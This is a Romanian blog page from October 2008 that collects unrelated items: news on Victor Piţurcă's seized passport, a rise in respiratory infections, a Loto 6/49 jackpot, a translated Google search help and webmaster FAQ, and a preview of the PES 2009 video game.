sâmbătă, 18 octombrie 2008

Ministrul de Interne susţine că Piţurcă nu trebuia lăsat fără paşaport


Şeful Poliţiei de Frontieră ne-a declarat că va prezenta, luni, rezultatele verificărilor pe care le-a dispus în cazul reţinerii paşaportului lui Victor Piţurcă.

Ministrul de Interne Cristian David susţine că paşaportul ar fi trebuit restituit direct selecţionerului naţionalei de fotbal. David a declarat că aşteaptă, totuşi, rezultatele anchetei dispuse de şeful Poliţiei de Frontieră în cazul ridicării de la Aeroportul Henri Coandă a lui Victor Piţurcă, luat pe sus şi dus la DNA.
„Nu cred că putem vorbi de un abuz, a declarat ministrul David la Realitatea TV. Este vorba de un mandat de aducere îndeplinit de ofiţerii judiciarişti de la DNA, însoţiţi de ofiţerul de Poliţie de Frontieră. Din punct de vedere al procedurilor, cred că această chestiune este fără probleme. Singurul aspect asupra căruia se poate discuta este dacă ar fi trebuit paşaportul restituit deţinătorului sau trebuia înmânat poliţiştilor judiciarişti. Cred că paşaportul ar fi trebuit restituit direct pentru că nu exista nici un motiv de reţinere a paşaportului. Rămâne de văzut dacă ancheta IGPF va constata o abatere de la normele procedurale obişnuite, respectiv reţinerea şi neînapoierea paşaportului celui în cauză”.
Şeful Poliţiei de Frontieră ne-a declarat că va prezenta, luni, rezultatele verificărilor pe care le-a dispus în cazul reţinerii paşaportului lui Victor Piţurcă.
Modificările procedurilor penale făcute de Parlament, contestate de Ministerul Justiţiei

Peste 50.000 de români sunt răciţi

Numărul bolnavilor a crescut spectaculos în ultima săptămână de raportare.
Cazurile de infecţii respiratorii au crescut cu 44,6%, la peste 50.000, între 6-12 octombrie faţă de săptămâna precedentă, arată datele colectate de la medici din toată ţara de Centrul pentru Prevenirea şi Controlul Bolilor Transmisibile (CPCBT). Numărul cel mai mare de îmbolăviri s-a înregistrat în judeţele Bistriţia, Bihor, Iaşi şi Covasna. Medicii spun însă că situaţia nu este deocamdată îngrijorătoare.
Copiii până în 4 ani, cei mai afectaţi
Mai exact, medicii au raportat aproape 64.000 de infecţii respiratorii şi pneumonii, cu 4.300 de internări şi trei decese cauzate de pneumonii în judeţele Prahova şi Iaşi. Din analiza datelor rezultă că, în comparaţie cu aceeaşi săptă- mână de supraveghere a anului 2007, numărul total de infecţii respiratorii este cu 31,5% mai mare, iar faţă de săptămâna precedentă, numărul total de infecţii respiratorii este cu 44,6% mai mare.
În judeţele Bistriţa, Iaşi şi Covasna numărul bolnavilor cu infecţii respiratorii este mai mare decât în restul ţării, iar în Bihor şi Gorj sunt mai multe cazuri de pneumonie. „Ratele de incidenţă cele mai crescute atât prin infecţii respiratorii, cât şi prin pneumonii se înregistrează la copiii până în 4 ani“, se arată în raportul CPCBT. Din cauza numărului mai mare de îmbolnăviri a crescut consumul de antitermice cu 14% faţă de săptămâna precedentă, iar absenteismului în creşe cu aproape 10% şi în licee cu 38%.
„Nu ar trebui să vă alarmaţi“
Specialiştii spun că această evoluţie, chiar dacă pare spectaculoasă, este normală. „Având în vedere că sunt 200-300 de virusuri respiratorii care circulă în acest sezon, procentul nu este unul îngrijorător. Virozele respiratorii sunt obişnuite în această perioadă, aşa că nu ar trebui să vă alarmaţi“, sugerează medicul Adrian Streinu Cercel, manager al Institutului de Boli Infecţioase „Matei Balş“, din Capitală. Şi medicul Adriana Pistol, şeful CPCBT, crede că procentele nu sunt foarte mari pentru sezonul în care ne aflăm. „Este însă prea devreme să ne exprimăm acum dacă vom avea sau nu o epidemie de gripă“, comentează ea. Pentru că gripa are complicaţii mult mai grave decât răcelile, vaccinarea este cea mai bună soluţie pentru evitarea neplăcerilor.
Prin campania de vaccinare gratuită vor fi imunizate 3.100.000 persoane. Copiii, adulţii cu suferinţe cronice, dar şi angajaţii sistemului sanitar vor fi principalele categorii care vor primi vaccinuri gratuite. Dacă vreţi să cumpăraţi vaccinul, îl găsiţi în farmacii la preţuri ce nu depăşesc 40 de lei.
44,6% este procentul cu care a crescut numărul de infecţii respiratorii în ultima săptămână de monitorizare

Potul la Loto 6/49 a ajuns la 3,6 milioane de euro

Potul la Loto 6/49 a ajuns la 3,6 milioane de euro

Compania Naţională Loteria Română pune în joc, la extragerea de mâine, un premiu de 3,6 milioane de euro la categoria I a jocului Loto 6/49.
Reportul la această categorie a trecut duminica trecută de circa 3,2 milioane de euro (12 milioane lei).
Loteria anticipează că la extragerea de mâine fondul de câş- tiguri se va apropia de premiul câştigat în urmă cu mai bine de două luni, adică de 3,8 milioane de euro. Împătimiţii de jocuri de noroc vor putea depune biletele până mâine la ora 14.00, la orice agenţie Loto din ţară.
Peste 200.000 de euro puse în joc la Noroc
La extragerea Loto 6/49 de săptămâna trecută s-au jucat peste 1,5 milioane de variante, numărul de bilete cumpărate ajungând la 614.801, în timp ce încasările au ajuns la 6,6 milioane de lei (1,7 milioane de euro). Fondul de câştiguri la categoria I pentru tragerea Noroc care va avea loc tot mâine a ajuns la circa 818.000 lei (218.000 euro), în timp ce încasările din tragerea precedentă au urcat la 920.543 de lei.
Nouă săptămâni de la ultimul norocos
Niciun jucător nu a mai reuşit să ghicească cele şase numere câştigătoare de mai bine de nouă săptămâni, când un ieşean de 40 de ani a intrat în rândul milionarilor în euro. Marele premiu la categoria I a jocului Loto 6/49 a fost adjudecat pe 10 august de un bărbat din Iaşi, care s-a văzut peste noapte mai bogat cu 3,8 milioane de euro.
Cel mai mare premiu din istoria jocului Loto 6/49, de aproximativ 12,5 milioane de euro, a fost câştigat la începutul acestui an de un jucător din Capitală, după ce timp de 20 de săptămâni nimeni nu a reuşit să ghicească toate cele şase numere.

Despre Google

Sfaturi Generale Pont: Google intoarce numai acele pagini ce includ toti termenii cautarii tale. Din moment ce Google intoarce pagini ce contin toate cuvintele din cererea dumneavoastra, restrangerea sau rearanjarea cautarii este la fel de simpla precum adaugarea mai multor cuvinte in termenii cautarii pe care i-ati adaugat deja. Prin adaugarea mai multor cuvinte, rezultatele vor contine un subset specific al paginilor intoarse de catre cererea originala "prea larga".Excluderea cuvintelor Pont: Poti exclude un cuvant din cautarea ta punand un semn minus ("-") imediat in fata termenului pe care vrei sa il eviti. Puteti exclude un cuvant din cautare prin scrierea semnului minus ("-") imediat inaintea termenului pe care vreti sa il evitati. (Fiti sigur sa includeti un spatiu inainte de semnul minus.)Cautarea frazelor Pont: Butonul "Ma simt norocos" te duce direct catre pagina de web al carei grad de relevanta este mai mare. Cu Google poti cauta fraze prin adaugarea ghilimelelor. Cuvintele incluse intre ghilimele ("asa") vor aparea impreuna in toate documentele intoarse (doar daca nu sunt cuvinte de sfarsit, cuvinte comune speciale ce necesita un semn "+" -- vezi aici pentru detalii). Cautarea frazelor folosind ghilimelele sunt folositoare cautarilor de fraze celebre sau anumite nume. Anumite caractere au rol de conectare a frazelor. Google recunoaste cratimele, barele, punctele, egalurile si apostroafele ca elemente de conectare a frazelor. Restrangere domeniu Unele cuvinte, cand sunt urmate de doua puncte, au o anumita semnificatie pentru Google. Un asemenea cuvant pentru google este operatorul "site:". Pentru a cauta un anume domeniu sau sit, folositi sintaxa "site:domeniuexemplu.com" in caseta de cautare Google.





Cautare pe Categori Directorul Google (care se afla la directory.google.com) te ajuta sa redefinesti cautarea ta bazata pe o idee particulara. De exemplu, cand cauti "Saturn" care se afla in domeniul stiintei > Categoria Astronomie din directorul Google iti dezvaluie pagini numai despre planeta Saturn. Nu iti da pagini despre masina Saturn, jocul Saturn, si multi alti termeni Cautand o categorie te poate ajuta sa descoperi paginile cele mai bune pentru tine Cautare Avansata Dese ori, pot adauga mai multe cuvinte in spatiul gol, care te poate ajuta pana cand gasesti ce iti trebuie. Dar Google iti poate oferi o varietate de cautari care te lasa:
Restrictioneaza cautarea ta la paginile care ti-au fost date
exclude paginile dintr-un site particular
limitati cautarea dvs. numai la pagini intr-o anume limba
gaseste toate paginile care au un link la o pagina data
gaseste pagini care sunt legate de o pagina data
Motorul avansat de cautare Google face mai usoara aplicarea acestor atribute.
Elemente ale Paginilor de Rezultate Google







A.
Cautare AvansataLegaturi catre o pagina ce va permite sa restrictionati cautarea daca este necesar.
B.
PreferinteLegaturi catre o pagini care va permite sa alegeti preferintele de cautare, inclusiv cate rezultate sa apara pe o pagina, limba interfetei si daca sa folosim sau nu filtrul nostru SafeSearch (Cautare Sigura).
C.
Instrumente de limbajUnelte pentru setarea limbii preferate pentru paginile in care urmeaza sa se efectueze cautarea, limbajul interfetei si traducerea rezultatelor.
D.
Sfaturi pentru cautareLegaturi spre informatii care va ajuta sa cautati mai eficient. Aflati diferentele dintre Google si alte motoare de cautare -- de la modul in care prelucram o cautare simpla pana la facilitatile speciale care ne fac deosebiti.
E.
Campul de cautarePentru a introduce o cautare in Google, scrieti cateva cuvinte semnificative. Dati Enter sau click pe butonul Cautare si va aparea lista cu rezultate.
F.
Butonul de cautare GoogleDati click pe acest buton pentru a porni o noua cautare. Puteti deasemenea incepe o cautare apasand tasta 'Enter'.
G.
TabulatoareApasa tabulatorul pentru modul de cautare pe care doresti sa o efectuezi. Alege dintre cautare completa pe internet, numai imagini, in grupurile de discutii Google (Arhiva de discutii Usenet) sau directorul Google (internetul organizat pe categorii).
H.
Bara de statisticiAceasta linie descrie cautarea dv. si indica numarul de rezultate gasite, precum si timpul necesar gasirii lor.
I.
CategoriiDaca termenii cautarii apar si in Director, aceste categorii sugerate va pot ajuta sa gasiti mai multe inforamtii despre subiectul cautarii. Dati click pe ele pentru a deschide alte legaturi.
J.
Titlul paginiiPrima linie este titlul paginii gasite. Uneori, in loc de titlu va fi un URL, ceea ce inseamna ori ca pagina nu are titlu, ori ca Google nu a catalogat inca intregul continut al paginii. Totusi, stim ca se potriveste cu ceea ce cautati fiindca alte pagini pe care le-am indexat contin legaturi spre aceasta pagina. Daca textul asociat acestor linkuri se potriveste cu cautarea dv., vom arata paigna la rezultate chiar daca intregul ei text nu a fost catalogat inca.
K.
Text sub titluAcest text e un citat din pagina gasita, cu textul pe care il cautati dv. scris ingrosat. Aceste citate va permit sa vedeti contextul in care apar termenii cautati, inainte sa dati click.
L.
DescriereCand cautarea apare in Director, descrierea creata de autorul Open Directory este afisata.
M.
CategoriaDaca un site gasit in cadrul cautarii dv. este listat in Director, categoria in care apare este afisata sub descriere.
N.
URL-ul (adresa) rezultatului (adresa) rezultatuluiAceasta este adresa web a rezultatului gasit.
O.
MarimeAcest numar reprezinta marimea textului din pagina gasita. Nu apare in cazul siteurilor care nu au fost inca indexate.
P.
MemorataUn click pe legatura catalogata va permite sa vedeti ce continea pagina atunci cand a intrat in indexul nostru. Daca - din orice motiv - legatura spre site nu va conecteaza la pagina actuala, puteti vedea versiunea veche si gasi acolo ceeea ce cautati. Termenii cautati vor fi evidentiati in versiunea catalogata.
Q.
Pagini similare Cand alegeti legatura 'Pagini Similare' pentru un anumit rezultat, Google cauta pe Internet pagini asemanatoare cu cea gasita.
R.
Rezultat indentatCand Google gaseste rezultate multiple de la acelasi site, cele mai relevante sunt afisate primele, iar celelalte mai jos, indentate (cu un alineat mai la dreapta).
S.
Mai multe rezultateDaca sunt mai mult de doua rezultate de pe acelasi site, restul de rezultate pot fi accesate facand clic pe link-ul "Mai multe rezultate de pe...".
Functii speciale GoogleCautare imagini (BETA) Cautarea imaginilor cu Google este cea mai cuprinzatoare din web, avand mai mult de 250 de milioane de imagini indexate si disponibile pentru vizualizare. Pentru a folosi motorul de cautare a imaginilor mergeti in pagina de cautare avansata sau http://www.google.com/imghp?hl=ro si introduceti o formula in caseta de cautare imagini apoi faceti clic pe butonul "Cauta". In pagina de rezultate faceti clic pe pictograma pentru a vedea o versiune de dimensiuni marite a imaginii cat si pagina in care imaginea poate fi gasita. (Nota: pentru a putea accesa, limba interfetei dumneavoastra trebuie setata pe English din pagina de preferinte). Imaginile identificate de motorul de cautare a imaginilor - Google poate fi protejat de drepturile de autor. Desi puteti gasi si accesa imagini cu ajutorul serviciului nostru, nu va putem garanta drepturile de a le folosi in alt scop decat vizualizarea pe web. De asemeni, daca doriti sa folositi unele imagini gasite cu ajutorul serviciului nostru, va sfatuim sa contactati administratorul sitului pentru a optine permisiunea sa.ATENTIE: Rezultatele pe care le vedeti cu ajutorul acestei functii pot contine informatii destinate persoanelor adulte. Google ia in considerare un numar de factori cand determina daca o imagine este relevanta cautarii dumneavoastra. Deoarece aceste metode nu sunt functionabile in intregime, este posibil ca anumite imagini nepotrivite sa fie incluse printre imaginile pe care le vedeti. Pentru mai multe informatii despre aceasta functie, va rugam sa cititi explicatiile motorului de cautare imagini.Traducere pagina Google sparge bariera limbajelor cu o noua functie de traducere (BETA). Folosind tehnologia de traducere a calculatorului, Google permite acum vorbitorilor de limba engleza sa acceseze o varietate de pagini in alte limbi. Daca rezultatul cautarii contine rezultate in alte limbi decat engleza, va exista o legatura catre o versiune a paginii respective tradusa in engleza. Daca vrei ca si titlurile si sumarul paginilor din rezultatele cautarii sa fie traduse in engleza, activati optiunea in pagina de preferinte. Cu aceasta functie activata, Google traduce automat rezultatele cautarii in engleza. Pentru mai multe informatii despre aceasta functie, va rugam sa cititi informatiile despre traducere.Gaseste fisiere PDF Rezulatele cautarii cu Google includ acum si fisiere Adobe Portable Document Format (PDF). Desi fisierele PDF nu sunt atat de dese cat fisierele HTML, ele contin frecvent informatii de calitate ce nu sunt disponibile in alta parte. Pentru a indica faptul ca un anumit rezultat este un fisier PDF si nu o pagina web, [PDF] apare cu text de culoare albastra inaintea titlului. Asta va va anunta ca programul Acrobat Reader se va lansa pentru a putea vizualiza fisierul. Faceti clic pe legatura din dreapta textului [PDF] pentru a accesa documentul PDF. (Daca nu aveti Adobe Acrobat pe calculatorul dumneavoastra, veti fi directionat catre o pagina web de unde il puteti lua gratuit.) Cu fisierele PDF, binecunoscuta legatura "Memorate" este inlocuita cu "Versiune text". Versiunea text este o copie a documentului PDF cu toate comenzile de formatare eliminate. Daca doriti sa vedeti un anumit de rezultate fara legaturi PDF, trebuie doar sa scrieti -filetype:pdf in caseta de cautare alaturi de termenii cautati.Legaturi memorate Google preia o imagine a fiecarei pagini examinate pe masura ce cauta pe web si o pastreaza in caz ca pagina originala nu este disponibila. Daca faceti clic pe legatura "Memorata", veti vedea pagina asa cum arata ea cand am indexat-o. Continutul memorat este continutul pe care Google a gasit-o drept similara cautarii dumneavoastra. Cand pagina memorata este afisata, va avea un antet in partea de sus a paginii ce serveste ca o nota de aducere aminte ca este o versiune memorata si nu pagina insasi. Termenii ce corespund cautarii dumneavoastra sunt subliniati pe pagina memorata pentru a va usura cautarea si a vedea de ce pagina este relevanta. Legatura "Memorata" va lipsi siturilor ce nu au fost indexate cat si siturilor ale caror proprietari ne-au cerut sa stergem continutul memorat. Pagini similare Cand faceti clic pe legatura "Pagini similare" a unui rezultat al cautarii, Google automat cauta pe web dupa pagini ce sunt similare acestui rezultat. Legatura "Pagini similare" are multe intrebuintari. Daca doriti continutul unui anumit sit dar doriti mai multe informatii, aceasta legatura poate gasi situri ce au continut similar cu care nu sunteti familiar. Daca vreti sa gasiti informatii despre produse, "Pagini similare" poate gasi informatii competitive pentru dumneavoastra pentru ca sa gasiti cel mai bun pret. Daca sunteti interesat in cercetarea unui anumit camp, va poate ajuta sa gasiti un numar larg de resurse foarte rapid, fara a pierde timp facandu-va griji despre cuvintele cheie ce ar putea fi folosite in siturile respective. Google gaseste paginile similare pentru multe milioane de pagini. In orice caz, cu cat mai complexa este o pagina, cu atat mai putine rezultate putem gasi. De exemplu, Google poate sa nu gaseasca pagini similare paginii dumneavoastra personale daca nu are destule informatii suficiente sa asocieze alte pagini cu cea a dumneavoastra. De asemenea, daca firmele/companiile folosesc URL-uri multiple pentru paginile lor (asa cum sunt google.com si www.google.com), ar putea exista putine informatii pe un URL si mai mult pe altul. Oricum, in general, "Pagini similare" functioneaza bine pentru majoritatea paginilor web. Gaseste cine are legaturi catre tine Unele cuvinte, cand sunt urmate de doua puncte (:), au un inteles aparte pentru Google. Un astfel de cuvant este operatorul 'link:'. Cautarea link: url va rezulta o lista cu toate paginile care indica spre URL-ul mentionat. De exemplu, cautarea link:www.google.com va arata o lista cu toate paginile pe care exista o legatura spre pagina Google. Nu se poate combina o cautare link: cu o cautare obisnuita dupa un cuvant cheie.
Restrangere Domeniu Unele cuvinte, cand sunt urmate de doua puncte, au o anumita semnificatie pentru Google. Un asemenea cuvant pentru google este operatorul "site:". Pentru a cauta un anume domeniu sau sit, folositi sintaxa "site:domeniuexemplu.com" in caseta de cautare Google. De exemplu, pentru a cauta informatii de presa pe situl Google, introdu:
Ma simt norocos Butonul "Ma simt norocos™" te duce automat direct catre prima pagina pe care Google a intors-o ca rezultat al cautarii tale. Nu vei vedea alte rezultate deloc. O cautare "Ma simt norocos" inseamna mai putin timp pentru cautarea paginilor si mai mult timp pentru citirea lor. De exemplu, pentru a gasi pagina Universitatii Stanford, doar introduceti Stanford in campul de cautare si faceti clic pe butonul "Ma simt norocos". Google te duce direct la "www.stanford.edu", pagina oficiala a Universitatii Stanford.


Bara de Butoane Google



Bara de Butoane Google(TM) iti sporeste abilitatea de a gasi informatii de oriunde din web si dureaza doar cateva secunde sa o instalezi. Bara de Butoane Google este disponibila gratuit si include functii minunate cum ar fi Cauta cu Google, Cauta in Site, Gaseste Cuvant, Subliniere si PageRank. Poti si sa iti personalizezi formatul barei de butoane in asa fel incat sa includa functii cum ar fi "Ma simt norocos", Director Web Google si un buton ce te duce direct in situl Google.Cerinte de sistem In acest moment, Bara de Butoane Google este disponibila numai pentru Internet Explorer. Cautam sa o implementam si pe alte sisteme.
Sistem de operare Windows
Internet Explorer 5.0+
Director Web Google Directorul Web Google organizeaza webul dupa topic, in asa fel incat sa poti rasfoi categoriile pentru a gasi cuvinte cheie pe care sa le folosesti in cautarea ta. Sau pur si simplu fa clic pe o categorie pana gasesti pagina pe care o vrei. Daca nu gasesti exact pagina pe care o cauti folosind cautarea in Director, poti alege sa cauti intregul Web
Adaugati/Modificati URL-ul Dumneavoastra Adaugam si innoim site-uri la indexul nostru de fiecare data cand cautam si te invitam sa ne trimiti URL-ul site-ului tau. Nu adaugam toate URL-urile trimise la index si nu putem prezice sau garanta cand sau daca vor aparea. Va rugam introduceti URL-ul dumneavoastra, in intregime, incluzand prefixul http:// De exemplu, http://www.google.com/. Puteti de asemenea adauga comentarii sau cuvinte cheie care descriu continutul paginii dumneavoastra. Acestea au pur caracter informativ si nu afecteaza felul in care pagina dumneavoastra este indexata sau utilizata de Google. NOTA: Numai pagina principala a unui site este necesara, nu este nevoie sa inscrieti fiecare pagina individual. Robotul nostru, Googlebot, va fi capabil sa gasesca restul paginilor. Important: Google isi innoieste indexul in mod regulat, asa ca link-urile vechi sau cele noi nu trebuie trimise. Link-urile moarte vor disparea din Google la urmatoarea re-indexare, atunci cand se innoieste intregul index.

Sterge continutul din indexul Google Google isi innoieste baza de date automat si la intervale regulate. Cand Google scaneaza pe internet sunt verificate si excluse link-urile nefunctionale si sunt adaugate cele noi. Link-urile vechi sau neannoite vor disparea treptat din baza de date. Daca doriti sa aflati cum sa cereti excluderea unor anumite site-uri din baza de date Google, va rugam apasati aici. Puneti o caseta de cautare Google in situl dvs. Daca doriti sa oferiti Google cautari din pagina dvs., copiati si lipiti codul in HTMLul paginii dumneavoastra. Sunteti bineveniti sa faceti orice modificari obisnuite, cum ar fi scoaterea codului de centrare, marirea casetei de cautare sau schimbarea culorii fundalului. (Notati ca, oricum, fundalul pentru sigla Google este alb, nu transparent). Avem mai multe sigle disponibile daca preferati schimbarea fundalului sau marimii siglei. Intrebari frecvente (FAQ)Alte intrebari1. De ce pagina Google este in alta limba, desi eu nu mi-am precizat optiunea despre limba de afisare? Google se foloseste de mecanismul standardizat pe Web numit "language-preferences" pentru a determina limba in care afiseaza. "Browserele" pot avea mai multe "accept-languages" aranjate in ordinea preferintei. Pentru a vedea sau modifica "accept-language" in Internet Explorer 5, selectati "Internet options" din meniul "Tools". Faceti clic pe butonul "Languages" pentru a vedea sau edita limba preferata. In "Netscape Navigator 4.7", selectati "Preferences" din meniul "Edit". Extindeti lista "Navigator" si apasati pe sub-lista "Languages" pentru a vedea sau modifica limba preferata. A se avea in vedere: alte situri web cu capabilitate "multi-lingual" care suporta instructiunea "accept-language" pot fi de asemenea afectate de modificarile efectuate la preferintele de limba. 2. Cum pot reveni la pagina Google in limba engleza? Puteti accesa pagina standard Google apasand pe "Google in English" de pe orice pagina. Daca doriti sa schimbati limba folosita fara a schimba limba acceptata de browser , puteti seta limba folosita de Google manial. Oricum, setarea preferintei limbii nu necesita ca cookiurile sa fie pornite. 3. Cum pot folosi caractere speciale pentru a cauta pe Google? Tehnologia folosita de Google cere scrierea corecta a cuvintelor. Scrierea corecta a cuvintelor, cu caracterele potrivite, va imbunatati calitatea rezultatelor cautarii ca si numarul de rezultate. Pentru instructiuni de scriere a caracterelor neenglezesti cu o tastatura englezeasca sau cu un alt model de tastatura vizitati urmatoarea pagina: http://www.umass.edu/langctr/keyboardhelp.html. 4. In cate limbi va fi tradus Google? Planurile Google sunt de a continua adaugarea de noi limbi serviciului nostru. Pentru a vedea cea mai actualizata lista de limbi oferita, viziteaza sectiunea Preferinte. 5. Cum as putea sa sugerez catre Google o imbunatatire a traducerii si pronuntarii? Google incearca sa ofere cele mai corecte traduceri pe paginile noastre internationale. Totusi, datorita naturii subiective a traducerii, se poate sa intalniti cuvinte care nu vi se par potrivite. Va rugam sa trimiteti aceste cuvinte cu o posibila alternativa la intl@google.com si vom lua in considerare contributia Dvs. la actualizarea interfetei cu utilizatorul.6. Cum trebuie sa pronunt "Google"? Nota pentru Traducator: Te rog explica cum traduci "Google" in limba taCauta intrebari1. Cum caut printre rezultate? Deoarece Google returneaza doar paginile de web care contin toate cuvintele din cautarea dvs., pentru a va asigura de o cautare cat mai eficienta trebuie sa mentionati cat mai multe cuvinte in cautarea dvs.2. Cum pot elimina rezultatele cautarile anterioare cand vreau sa incep una noua? Termenii cautati anterior sunt o functie a programului Internet Explorer 5.0. Pentru a opri aceasta functie, apasati pe "Internet Options" din meniul "Tools" si selectati tab-ul "Content". In zona de informatii personale, selectati 'AutoComplete'. Dati click pe butonul "Clear Forms". Puteti deasemenea sa deselectati optiunea "Forms" din aceeasi fereastra pentru a preveni cautarile anterioare sa mai apara in viitor. Mai puteti sa stergeti manual intrari din tabelul cu termenii cautati anterior utilizand tasta "Jos" pentru a selecta o cautare anterioara, si apoi apasand tasta "Delete" in timp ce termenul nedorit este selectat.3. Cum sunt afisate rezultatele cautarii? Ordinea afisarii rezultatelor este determinata de mai multi factori, inclusiv "notarea" acestora de catre Google (PageRank). Va rugam sa intrati pe pagina noastra De ce sa folosim Google? pentru alte detalii.Intrebarile webmasterului1. Trebuie sa introduc link-uri si pagini noi si/sau vechi in Google? Google isi reinnoieste index-ul des, asa ca introduceri de link-uri noi sau vechi nu sunt necesare. Ar trebui sa reusim sa le culegem in timpul fiecarei parcurgeri. 2. Cum pot sa trimit mai multe pagini ? Va rugam sa vizitati pagina Adauga un URL pentru a introduce URL-urile dumneavoastra; nu este necesar sa introduceti fiecare pagina. Web Crawler-ul nostru, Googlebot, va reusi sa gaseasca restul site-ului.3. De ce Google nu are indexate nici una din paginile mele? Paginile care nu au fost indexate deja probabil ca nu au fost incluse pentru ca nu exista destule pagini pe Internet care sa contina legaturi catre ele -- daca alte site-uri nu contin legaturi catre o pagina, nu putem sa ii dam un PageRank (modul nostru propriu de a masura importanta unei pagini) intr-un mod rezonabil. Odata ce alte pagini contin legaturi catre o pagina, o vom indexa. Google analizeaza modul in care fiecare pagina este legata de alte pagini si astfel permite gasirea celor mai relevante pagini din imensitatea paginilor de pe Internet. 4. Care este timpul necesar indexarii de catre robotul Google, din momentul in care un URL a fost trimis? In functie de durata aplicarii sau de intarzierea noastra, intregul proces poate dura intre una si patru saptamani. 5. De ce titlul paginii nu apare cateodata in rezultate? Spre deosebire de alte motoare de cautare, motorul Google - Googlebot - poate intoarce rezultate chiar daca nu a indexat deja pagina. Paginile ce sunt cunoscute dar nu au fost indexate pot fi intoarse ca rezultate, dar din moment ce inca nu ne-am uitat la ele, titlurile nu vor aparea. In schimb va aparea URL-ul. 6. Cum cer lui Google sa nu ofere inregistrari stocate in baza acestuia de date, de pagini din situl meu? Raspunsul la aceasta intrebare este cel mai bine explicat pe pagina "Sterge continut"7. Cum ii cer motorului Google sa nu indexeze o parte din situl meu sau sa nu il indexeze deloc? Un standard pentru excluderea robotilor poate fi gasit la http://www.robotstxt.org/wc/norobots.html. Puteti pune un fisier pe serverul dumneavoastra, numit robots.txt care poate exclude motorul de cautare Google (cat si alte motoare) din indexarea sitului. Motorul de cautare Google are ca user-agent "Googlebot". Exista un alt standard pentru a spune robotilor sa nu indexeze o pagina sau sa nu urmeze legaturile din ea, care poate fi de mai mult ajutor in anumite cazuri deoarece poate fi folosit mai convenabil pe baza unei metode pagina-cu-pagina. Presupune plasarea unui element "META" intr-o pagina HTML si este descris (in engleza) la http://www.robotstxt.org/wc/exclusion.html#meta. Puteti sa cititi si ce spune standardul HTML despre aceste elemente. Retineti ca schimbarea fisierului robots.txt al serverului sau schimbarea elementelor "META" pe paginile sale nu va avea un efect imediat in rezultatele intoarse de Google. Se poate sa dureze un timp pentru ca schimbarile pe care le-ati facut sa fie incluse in urmatoarea indexare a Google. Intrebari tehnice.1. De ce Googlebot ma intreba de un fisier numit robots.txt care nu se afla pe serverul meu ? Robots.txt este un document standard ce ii poate spune lui Googlebot sa nu descarce anumite (sau toate) informatii de pe serverul dumneavoastra de web. 2. De ce Googlebot incearca sa descarce linkuri incorecte de pe serverul meu ? Exista o proprietate a web-ului ca multe legaturi sa nu (mai) fie disponibile la o anumita data. Oricand cineva tasteaza o adresa incorecta ce face trimitere la situl dumneavoastra sau care nu poate sa actualizeze paginile pentru a reflecta schimbarile de pe serverul dumneavoastra, Googlebot va incerca sa descarce o legatura incorecta din situl dumneavoastra. De asemenea, din aceasta cauza s-ar putea ca sa inregistrati vizite pe o statie ce nu este deloc un server web. 3. De ce Googlebot descarca informatii din partea "secreta" a serverului nostru? Este aproape imposibil sa pastrezi un server web secret prin nepublicarea nici unei legaturi catre el. Imediat ce o anumita persoana urmeaza o legatura de pe serverul dumneavoastra "secret" catre un alt server web, este probabil ca URL-ul "secret" sa existe in elementul "referrer" si sa poata fi pastrat si probabil publicat de alte servere web in fisierul de LOGuri. Deci daca exista o legatura catre serverul dumneavoastra "secret" sau o pagina oriunde pe web, este probabil ca Googlebot si alte motoare de cautare sa il gaseasca. 4. De ce nu urmeaza Google instructiunile fisierului aflat pe situl meu, numit robots.txt? Pentru a avea o latime de banda cat mai mare, Googlebot descarca fisierul robots.txt doar o data pe zi sau oricand am indexat mai multe pagini de pe server. Deci s-ar putea sa dureze un timp pentru ca Googlebot sa stie de orice schimbare survenita in fisierul robots.txt. De asemenea, Googlebot este distribuit pe mai multe statii. Fiecare dintre acestea pastreaza propria inregistrare a fisierului robots.txt. De asemenea, verificati ca sintaxa este corecta conform standardului de la adresa http://www.robotstxt.org/wc/norobots.html. Daca inca mai apare vreo eroare, va rugam sa ne anuntati si o vom corecta! 5. Cum inregistrez situl meu cu Googlebot pentru a fi indexat? Adaugam si actualizam noi situri in indexul nostru de fiecare data cand cautam pe web fara nici un fel de interactiune cu dumneavoastra. Daca doriti, puteti inscrie situl dumneavoastra prin Formularul Adauga URL 6. Cum pot sa inlatur un site din Google? Google actualizeaza propriul index automat la intervale regulate. Cand cautam pe web, gasim pagini noi, stergem legaturile care nu sunt disponibile si actualizam legaturile automat. Legaturile care nu duc nicaieri vor disparea probabil la urmatoarea indexare. Pentru informatii detaliate despre cum se poate sterge sau scoate din index ("cache") o pagina in Google, clic aici. 7. De ce exista "hit-uri" dinspre mai multe masini ale Google, toate folosind acelasi "user-agent" Googleboot? Googlebot a fost proiectat pentru a fi distribuit pe mai multe statii in scopul imbunatatirii performantei si indexului pe masura ce webul se imbunatateste. De asemenea, pentru a reduce latimea de banda folosita ne-ar placea sa lansam noi motoare de cautare care sa ruleze pe statii indexate, apropiate lor.

Pes 2009 ( Pro Evolution Soccer 2009)


Pro Evolution Soccer 2009 (PES 2009) este urmatorul joc din seria Pro Evolution Soccer, dezvoltat de Konami pentru PlayStation 3, Xbox 360, PC, PlayStation 2 si PSP. Pes 2009 va fi lansat pe 17 octombrie 2008 si este unul dintre cele mai asteptate jocuri de fotbal, dupa ce PES 2008 a fost unul dintre cele mai bine vandute jocuri de la sfarsitul anului 2007 in Europa. Noutatea principala a edititiei din acest o constituie introducerea in joc a Ligii Campionilor, printr-un contract de 4 ani de exclusivitate semnat de Konami cu UEFA. Dezvoltatorii au afirmat ca editia din acest an va avea o grafica superioara si un realism care va surprinde pe multi fani ai jocurilor de fotbal. Bineinteles, nu vor lipsi noile miscari, noile driblinguri, precum si noile functii de control.


Pana in acest moment, echipele nationale licentiate pentru PES 2009 sunt: Argentina, Grecia, Olanda, Italia, Portugalia, Turcia, Brazilia si Spania. Ligile oficiale pentru PES 2009 sunt urmatoarele: French Ligue 1; Italia - Serie A, Dutch Eredivisie si Liga1 spaniola. Pe langa echipele din ligile confirmate, vor mai apare urmatoarele echipe: Manchester United, Liverpool, CSKA Moscova, Spartak Moscova, Lokomotiv Moscova, Werder Bremen, Sparta Praga, Benfica Lisabona, Sporting, FC Porto, Besiktas, Galatasaray si Fenerbahce. Au mai fost confirmate si marcile oficiale pentru echipamentele jucatorilor din PES 2009. Acestea sunt: Adidas, Nike, Reebok, Lotto, Umbro si Puma. Jucatorii vor putea personaliza ghetele de fotbal ale fotbalistilor.



Pe coperta Pro Evolution Soccer 2009 se va gasi Lionel Messi de la FC Barcelona.

Mafia II


